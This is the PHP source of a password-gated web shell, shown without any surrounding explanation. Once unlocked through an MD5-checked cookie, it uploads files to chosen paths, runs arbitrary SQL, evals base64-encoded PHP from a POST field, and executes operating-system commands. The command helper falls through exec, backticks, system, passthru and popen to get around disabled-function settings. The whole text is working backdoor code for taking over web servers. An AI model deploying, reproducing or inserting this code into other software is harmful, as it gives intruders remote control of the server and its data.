error_reporting(E_ERROR | E_WARNING | E_PARSE); ini_set('display_errors', "0"); if ($_POST["p"] != "") { $_COOKIE["p"] = $_POST["p"]; setcookie("p", $_POST["p"], time() + 3600); } if (md5($_COOKIE["p"]) != "ca3f717a5e53f4ce47b9062cfbfb2458") { echo "
"; echo ""; echo ""; echo "
"; exit; } if ($_POST["action"] == "upload") { $l=$_FILES["filepath"]["tmp_name"]; $newpath=$_POST["newpath"]; if ($newpath!="") move_uploaded_file($l,$newpath); echo "done"; } else if ($_POST["action"] == "sql") { $query = $_POST["query"]; $query = str_replace("\'","'",$query); $lnk = mysql_connect($_POST["server"], $_POST["user"], $_POST["pass"]) or die ('Not connected : ' . mysql_error()); mysql_select_db($_POST["db"], $lnk) or die ('Db failed: ' . mysql_error()); mysql_query($query, $lnk) or die ('Invalid query: ' . mysql_error()); mysql_close($lnk); echo "done
$query
"; } else if ($_POST["action"] == "runphp") { eval(base64_decode($_POST["cmd"])); } else { $disablefunc = @ini_get("disable_functions"); if (!empty($disablefunc)) { $disablefunc = str_replace(" ","",$disablefunc); $disablefunc = explode(",",$disablefunc); } else $disablefunc = array(); function myshellexec($cmd) { global $disablefunc; $result = ""; if (!empty($cmd)) { if (is_callable("exec") and !@in_array("exec",$disablefunc)) {@exec($cmd,$result); $result = @join("\n",$result);} elseif (($result = `$cmd`) !== FALSE) {} elseif (is_callable("system") and !@in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); @system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_callable("passthru") and !@in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); @passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_resource($fp = @popen($cmd,"r"))) { $result = ""; while(!feof($fp)) {$result .= @fread($fp,1024);} @pclose($fp); } } return $result; } $cmd = stripslashes($_POST["cmd"]); $cmd_enc = stripslashes($_POST["cmd_enc"]); if ($_POST["enc"]==1){ $cmd=base64_decode($cmd_enc); } ?> "; echo ""; echo ""; echo ""; echo ""; echo ""; if ($cmd != "") { echo "
";
        $cmd=stripslashes($cmd);
        echo "Executing $cmd \n";
        echo myshellexec("$cmd");
        echo "
"; exit; } }